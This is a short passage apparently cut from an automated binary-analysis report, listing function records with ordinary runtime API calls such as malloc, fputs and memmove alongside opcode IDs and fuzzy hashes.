                              • Instruction Fuzzy Hash: 43D0127250421DABCF156B94DC05CDD7BBDFF18214700441EF551E2160EAB5E5148794
                              APIs
                              • __EH_prolog.LIBCMT ref: 007080AF
                                • Part of subcall function 006B1E0C: malloc.MSVCRT ref: 006B1E1F
                                • Part of subcall function 006B1E0C: _CxxThrowException.MSVCRT(?,00764B28), ref: 006B1E39
                                • Part of subcall function 006FBDB5: __EH_prolog.LIBCMT ref: 006FBDBA
                              Similarity
                              • API ID: H_prolog$ExceptionThrowmalloc
                              • String ID:
                              • API String ID: 3744649731-0
                              • Opcode ID: a1524995d585e6df854ac365cc223c0ec8ea4bbefaca431f96a94ad42edc7e94
                              • Instruction ID: 85db14ffc49f7189a271cffb19c723c1096d9c179bb91cf8c692187b678ff959
                              • Opcode Fuzzy Hash: a1524995d585e6df854ac365cc223c0ec8ea4bbefaca431f96a94ad42edc7e94
                              • Instruction Fuzzy Hash: 3DD017B1A01605AECB88ABB494267AE72A2AB44340F00857EA416E6781EF7889008616
                              APIs
                              Similarity
                              • API ID: fputs
                              • String ID:
                              • API String ID: 1795875747-0
                              • Opcode ID: 5706428ad4357097cf38ca5ae5c1284849ba8afdd670d26ad09cef6037d08977
                              • Instruction ID: ed99d1aff338bc9e355d4f9639a412de6fbcbbc53153bea30162fa0119825ec4
                              • Opcode Fuzzy Hash: 5706428ad4357097cf38ca5ae5c1284849ba8afdd670d26ad09cef6037d08977
                              • Instruction Fuzzy Hash: ECD0C976008352AF96666F05EC09CCBBFA6FFD9321721082FF480921609B626865DBA5
                              APIs
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: cd71f494001e3ba49f55210878b34960ff4776a22f930a78fc01007fb15c0724
                              • Instruction ID: 187a862a348d96bef253b6f2311b4acf28fb9a495d90e7df525390dfbc3d1d09
                              • Opcode Fuzzy Hash: cd71f494001e3ba49f55210878b34960ff4776a22f930a78fc01007fb15c0724
                              • Instruction Fuzzy Hash: 5F812CB1E042499FCF24CFA8C484AEEBBB2AF48324F14846AD511A7341D775AAC5CF64